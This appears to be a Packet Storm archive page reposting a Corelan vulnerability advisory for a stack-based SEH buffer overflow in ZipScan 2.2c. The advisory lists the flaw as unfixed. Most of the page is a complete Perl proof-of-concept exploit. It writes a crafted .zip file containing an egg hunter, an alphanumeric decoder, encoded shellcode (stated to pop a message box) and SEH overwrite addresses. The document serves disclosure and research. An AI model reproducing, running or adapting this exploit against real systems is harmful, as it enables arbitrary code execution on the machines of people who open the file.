exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ZipScan 2.2c Buffer Overflow

ZipScan 2.2c Buffer Overflow
Posted Apr 6, 2010
Authored by corelanc0d3r, Lincoln

ZipScan version 2.2c buffer overflow exploit that creates a malicious .zip file.

tags | exploit, overflow
SHA-256 | 1ceca7cff059a32bb8f47a5ede4b7d904ae8a6fab410175e36f81eadad238be9

ZipScan 2.2c Buffer Overflow

Change Mirror Download

|------------------------------------------------------------------|
| __ __ |
| _________ ________ / /___ _____ / /____ ____ _____ ___ |
| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |
| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |
| |
| http://www.corelan.be:8800 |
| security@corelan.be |
| |
|-------------------------------------------------[ EIP Hunters ]--|
| |
| Vulnerability Disclosure Report |
| |
|------------------------------------------------------------------|

Advisory : CORELAN-10-020
Disclosure date : April 3rd, 2010
http://www.corelan.be:8800/advisories.php?id=CORELAN-10-020


00 : Vulnerability information
-------------------------------------
Product : ZipScan 2.2c
Version : 2.2c (latest version)
Vendor : contact@foobarsoftware.com / http://www.zipscan.co.uk/
URL : http://www.zipscan.co.uk/download.htm
Platform : Windows
Type of vulnerability : Stack overflow
Risk rating : medium
Issue fixed in version : not fixed
Vulnerability discovered by : Lincoln
Corelan Team : http://www.corelan.be:8800/index.php/security/corelan-team-members/


01 : Vendor description of software
-------------------------------------
>From the vendor website:
"ZipScan searches archive files. It can search Zip, CAB, RAR, ACE,
InstallShield CAB, JAR, TAR, GZIP, Z, ZOO, LZH, ARJ, CHM and
OpenOffice files, including password-protected, nested and
self-extracting archives. The program supports text searching and can
open and extract files."

02 : Vulnerability details
-------------------------------------
When a specially crafted zip file is opened from within ZipScan,
an exception handler gets overwritten, allowing to trigger arbitrary
code execution.
The way to trigger the vulnerability :

- open the zip file from within ZipScan : "File - Open Archive File"
Or
- Click "open archive file and view its contents"
- double-click on the filename inside the zip file


03 : Author/Vendor communication
-------------------------------------
March 23 2010 : author contacted
March 20 2010 : sent reminder
April 3 2010 : No response, public disclosure


04 : PoC
----------
#!/usr/bin/perl
# Software : ZipScan 2.2c (.zip)
# Bug found by : Lincoln
# Author : Lincoln & corelanc0d3r
# OS : Windows
# Tested on : XP SP3 En (VirtualBox)
# Type of vuln : SEH
# Greetz to : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#
# Code :
print "|------------------------------------------------------------------|\n";
print "| __ __ |\n";
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n";
print "| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n";
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n";
print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/ |\n";
print "| |\n";
print "| http://www.corelan.be:8800 |\n";
print "| |\n";
print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";
print "[+] Exploit for ZipScan 2.2c \n";



my $filename="zipscan.zip";
my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\x88\x13" .# file size: 5k
"\x00\x00\x00";

my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x88\x13". # file size: 5k
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00".
"\xb6\x13\x00\x00". # +46
"\xa6\x13\x00\x00". # +30
"\x00\x00";

my $decoder =
#pop edx pop esp
"\x5b\x5b\x5b\x5b\x5c".

#jmp ebp
"\x25\x4A\x4D\x4E\x55".
"\x25\x35\x32\x31\x2A".
"\x2d\x55\x55\x55\x64".
"\x2d\x55\x55\x55\x64".
"\x2d\x56\x55\x56\x51".
"\x50".

#add ebp, 526h
"\x25\x4A\x4D\x4E\x55".
"\x25\x35\x32\x31\x2A".
"\x2d\x35\x69\x48\x54".
"\x2d\x25\x69\x48\x54".
"\x2d\x25\x68\x48\x52".
"\x50".

#jmp back to decoded op code
"\x7a\xb5";

#basereg ebp, modified egg hunter mov edx,ebp
#points egg hunter to unmodified shellcode
my $egg =
"UYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0".
"BBABXP8ABuJIOyJB2bPRPjs2shZmfNwLWuSj44ho".
"nXRWdpVPqdNkXznOrUZJNO45jGKOxgA";

#msg box "Exploited by Corelan Security Team"
#encoded with Alpha2 base reg edi
my $shellcode =
"w00tw00t".
"WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0B".
"BABXP8ABuJIoy8c9JkgXYt3jTsiQYg9syQYqYbiRiW".
"9g9QYBiCsrc0CqSssssvW3aqJqzQQV8BpVPqQ4p712".
"KQQsqv1drBabbP2QRcrTprbw2RaSrpXrpTx2a72RU0".
"JCyPJrYSzpKPMrkRk59V1qtSuptQZaD75QqRnP2Rnb".
"rBbQJQVPQ3yV9pBaTPN2Ksa3Q74bPBl0KQSw6BdPLP".
"NBK3rsfqW0lrlpKBqQFQTpHBlRkpQPnbeppBn2Ksua".
"vrpWHRpBoswQxPPPuPLTsBpRy1UPQPKQq0KropH51p".
"QRPPL2kPPPlQVrd0E44pL2kCaruqWpLBlpKpPcd0Cd".
"uPPRXPCFQpKaJ0LPK2b2JpGSXPNRKw3BJW7Rpsucar".
"jpKQX53QVf7bpw9BnbKW4PtBlRkw5pQQZ0NBd410I0".
"orpDqBkppbkPLBnblpOSDPKRPQSpDqV0jaZCQrjBOq".
"T0M3wqarkSGcxPi3zPQrkPOPIrOG9ROSurKpCrlqUS".
"D3aUhrqau1Yrn0NPkpB1jsu0tRerq0JpKssqF2nBK3".
"vPlSr2K2lpKssSZPEpLPC6QSzbkPNPkW5qDRnRKqW4".
"1RmwHRosISabtcv74rgbLG5fQBj2C0Og2QT1XbfBiW".
"8sdpOpy2kQEpMv9CyrrpPbHpLpN0PRnQTpN3xRLRp2".
"rpKrxpM2lpKBoqYpoPKPO2oQiv1seG6QtpMpkF1PnS".
"yQX0MtrpQrC2lpGsu0LPD54sag2pMtxPNBKw9ROBiR".
"OPK0OPLRiqRsUQWBXG32x1RPL2pPl0EPppKpOrqPxQ".
"Ww3Suu2sv2nreVT3u4xV1REPQqspEp50D6RRmChV1p".
"LaT2D2dczBlSyaXcVQSbFpKroSsqu3v3TblCy2k0rp".
"PpPpMbKPN78rlarv0pMpMplpNpgQWpl3w2t2fVRpKs".
"hpC2NpIPoPIpoRiPoCraXPQrTqURQpQpHpEPp73PXQ".
"T4pQS77aRRnw2G5CtPq0K0kPKGHqSplSuBTaVu6pK0".
"9QXRCpE6X2p51G2PMv0shG5Pprqt8QRsiqUbPRpSdp".
"QRUbqrXQTVU1S3rrpPiPQU4PCv8savPQS2Cg5Ue3sC".
"cV1t8qRW5PBPL0PsQRp0nrbcxpQDpSaPSRp2OPPRRQ".
"UUhpCpTv1dpbp2B73W9PQPx3rpOpCQIsr2tBppeF1b".
"XSrpepQu872pPV0BLW6saQXCyRnaxBpPLbf74PEPr0".
"MCi0IBQqTt1pJprqSrBCsSSRp0QQVp2pKRo1X0PRpt".
"qpOVPPF6PbkPObqPECtsxSuRzQQ1QA";

#Filler
my $mjunk = "A" x 30;

# --- payload --- 5k total
my $junk = "A" x 22 . $egg . "A" x 3427;
my $nseh="\x7a\x06\x41\x41";
my $seh="\x16\x09\x01\x10"; #universal
my $payload = $junk.$nseh.$seh.$decoder.$shellcode.$mjunk;
$payload = $payload . ".txt";

print "[+] Size : " . length($payload)."\n";
system("del $filename");
print "[+] Creating new vulnerable file: $filename\n\n";
open(FILE, ">$filename");
print FILE $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header;
close(FILE);
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close